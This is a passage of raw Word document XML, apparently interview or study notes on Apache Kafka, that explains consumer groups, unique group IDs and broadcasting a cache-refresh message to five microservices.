    <w:p w14:paraId="63DE216C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Valid Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB50C11"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Kafka's </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publish-subscribe model</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>broadcasting events</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like cache invalidation to multiple independent services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9CCE3A" w14:textId="77777777" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="000F6ED5" w:rsidP="000F6ED5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This setup ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all services get notified</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without duplicating messages within a single service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0700B"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2D23A8A7">
          <v:rect id="_x0000_i3579" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF74230"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Alternative Approach: Kafka with Consumer Groups (Not Suitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB336BA"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If all services belong to the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will get the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847712F"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This is not suitable for your use case, as </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all 5 services need to be notified</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CDFC66" w14:textId="77777777" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="00000000" w:rsidP="000F6ED5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4C09C883">
          <v:rect id="_x0000_i3580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458DD93" w14:textId="77777777" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="000F6ED5" w:rsidP="000F6ED5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best Practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50392871"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each microservice to ensure all of them receive the cache refresh message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1614D" w14:textId="77777777" w:rsidR="000F6ED5" w:rsidRPr="000F6ED5" w:rsidRDefault="000F6ED5" w:rsidP="000F6ED5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at least once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6ED5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so even if a microservice is down during the notification, it will receive the message once restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241DCA48" w14:textId="77777777" w:rsidR="00522F3E" w:rsidRDefault="00000000" w:rsidP="00522F3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56217E">
          <v:rect id="_x0000_i3581" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39762402" w14:textId="6553C595" w:rsidR="00F77084" w:rsidRPr="00D87893" w:rsidRDefault="00F77084" w:rsidP="00F77084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="884" w:name="_Toc197868098"/>
      <w:r w:rsidRPr="00F77084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Let's say we have 5 microservices so can we multiple consumer group in different consumer Groups? Group id will be different or same</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="884"/>
    </w:p>
    <w:p w14:paraId="17834F34" w14:textId="644E3016" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="000D1250" w:rsidP="00491329">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, you can have </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your Kafka setup, and </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each consumer group must have a unique group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238237D0"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50F59498">
          <v:rect id="_x0000_i3582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3E9B2"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Concept Recap: Consumer Group in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49484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Consumer Group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726693DF"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A consumer group is a set of consumers that </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>share the work of consuming messages</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from one or more Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443C82C"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Each group has a </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17632B0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Message Delivery to Consumer Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277A794"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message from a Kafka topic</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered to each consumer group independently</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364BD65"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If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 separate consumer groups</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each will get a copy of the message</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2A35B"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Consumer Group ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7801C7D3"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>group ID must be unique</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BEDD3" w14:textId="77777777" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="000D1250" w:rsidP="000D1250">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consumers in </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different groups</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do not interfere</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with each other, allowing </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each group to receive the message separately</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFA161"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785269C6">
          <v:rect id="_x0000_i3583" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9EC51A"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Scenario: 5 Microservices Receiving the Same Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC5F7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Notification Microservice (Producer)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> publishes a </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"cache refresh"</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message to a topic: cache-refresh-topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8581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5 Microservices (Consumers)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listen to the same topic but belong to </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8832BC"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Example Group IDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F41F8"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A: group-id: serviceA-consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62A1A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B: group-id: serviceB-consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1813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C: group-id: serviceC-consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73267E6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D: group-id: serviceD-consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD3A5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Microservice E: group-id: serviceE-consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A452475"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="0CB0D9FA">
          <v:rect id="_x0000_i3584" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39945D18"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Why Different Group IDs are Needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC42B3A"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If </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all consumers share the same group ID</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only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from that group will receive the message (because Kafka ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each partition is consumed by only one consumer within a group</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB0AC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If </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all consumers will receive the message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, as they are considered </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the topic.</w:t>
